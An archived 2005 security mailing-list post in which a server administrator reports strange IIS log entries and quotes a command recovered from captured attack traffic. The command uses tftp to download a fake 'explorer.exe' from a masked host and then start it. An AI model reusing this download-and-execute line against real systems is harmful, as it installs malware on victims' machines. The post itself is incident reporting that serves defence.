Re: Re: New http attack?
phil_at_ramtronik.com
Date: 06/20/05
- Previous message: Harlan Carvey: "part deux, was -> RE: Digital forensics of the physical memory"
- Maybe in reply to: Ron: "Re: New http attack?"
- Next in thread: phil_at_ramtronik.com: "Re: Re: New http attack?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 19 Jun 2005 22:14:59 -0000 To: incidents@securityfocus.com('binary' encoding is not supported, stored as-is) Hello,
saw your post after considerable searching for the same mysterious 'get / 401' errors in my IIS log. I managed to get a full capture of the communication, further down from the 'QUFB' repetition was an embedded string:
cmd /c tftp -i x.x.x.x GET explorer.exe
start explorer.exe
exit
have hidden IP for obvious reasons. I managed to download the file myself manually, and submitted to symantec, as my virus checker didnt flag it. incidentally, i ran the file, and it wasn't explorer, though i dont know what it is.
Phil
- Previous message: Harlan Carvey: "part deux, was -> RE: Digital forensics of the physical memory"
- Maybe in reply to: Ron: "Re: New http attack?"
- Next in thread: phil_at_ramtronik.com: "Re: Re: New http attack?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
